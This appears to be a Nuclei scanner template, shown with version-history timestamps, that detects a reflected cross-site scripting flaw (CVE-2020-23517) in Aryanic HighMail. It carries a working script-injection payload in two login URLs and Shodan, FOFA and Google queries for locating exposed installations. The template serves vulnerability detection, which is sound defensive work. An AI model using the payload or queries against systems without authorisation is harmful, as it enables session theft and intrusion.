nuclei-templates/http/cves/2020/CVE-2020-23517.yaml

62 lines
2.3 KiB
YAML
Raw Normal View History

2021-03-29 15:52:28 +00:00
id: CVE-2020-23517
info:
2022-07-03 17:22:29 +00:00
name: Aryanic HighMail (High CMS) - Cross-Site Scripting
2021-03-29 15:52:28 +00:00
author: geeknik
severity: medium
description: A cross-site scripting vulnerability in Aryanic HighMail (High CMS) versions 2020 and before allows remote attackers to inject arbitrary web script or HTML, via 'user' to LoginForm.
2023-09-27 15:51:13 +00:00
impact: |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.
2023-09-06 12:22:36 +00:00
remediation: |
To mitigate this vulnerability, it is recommended to implement proper input validation and sanitization techniques to prevent the execution of malicious scripts.
reference:
- https://vulnerabilitypublishing.blogspot.com/2021/03/aryanic-highmail-high-cms-reflected.html
2022-07-03 17:22:29 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2020-23517
- https://github.com/ARPSyndicate/kenzer-templates
- https://github.com/Elsfa7-110/kenzer-templates
- https://github.com/d4n-sec/d4n-sec.github.io
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2020-23517
cwe-id: CWE-79
2024-05-31 19:23:20 +00:00
epss-score: 0.00135
epss-percentile: 0.48718
2023-09-06 12:22:36 +00:00
cpe: cpe:2.3:a:aryanic:high_cms:*:*:*:*:*:*:*:*
2022-07-02 12:59:01 +00:00
metadata:
2023-06-04 08:13:42 +00:00
verified: true
2023-09-06 12:22:36 +00:00
max-request: 2
2023-07-11 19:49:27 +00:00
vendor: aryanic
product: high_cms
shodan-query:
- title:"HighMail"
- http.title:"highmail"
fofa-query:
- title="HighMail"
- title="highmail"
2024-05-31 19:23:20 +00:00
google-query: intitle:"highmail"
2022-07-03 17:22:29 +00:00
tags: cve,cve2020,xss,cms,highmail,aryanic
2021-03-29 15:52:28 +00:00
http:
2021-03-29 15:52:28 +00:00
- method: GET
path:
2022-07-02 12:59:01 +00:00
- "{{BaseURL}}/login/?uid=%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E"
2022-07-02 19:26:38 +00:00
- "{{BaseURL}}/?uid=%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E"
2021-03-29 15:52:28 +00:00
2022-07-02 19:26:38 +00:00
stop-at-first-match: true
2023-07-11 19:49:27 +00:00
2021-03-29 15:52:28 +00:00
matchers-condition: and
matchers:
- type: word
words:
2022-07-03 17:22:29 +00:00
- 'value=""><script>alert(document.domain)</script>'
2022-07-02 12:59:01 +00:00
2021-03-29 15:52:28 +00:00
- type: word
2023-07-11 19:49:27 +00:00
part: header
2021-03-29 15:52:28 +00:00
words:
2022-07-03 17:22:29 +00:00
- text/html
2022-07-02 12:59:01 +00:00
- type: status
status:
- 200
# digest: 4a0a004730450220154df7868429b23b96e73af4e3eabceace22d921d859b41f9ca200509decb003022100ce2e68eccba5dea0c0077f4b1ccb54bfb3164f7add0893192dba06672e328afa:922c64590222798bb761d5b6d8e72950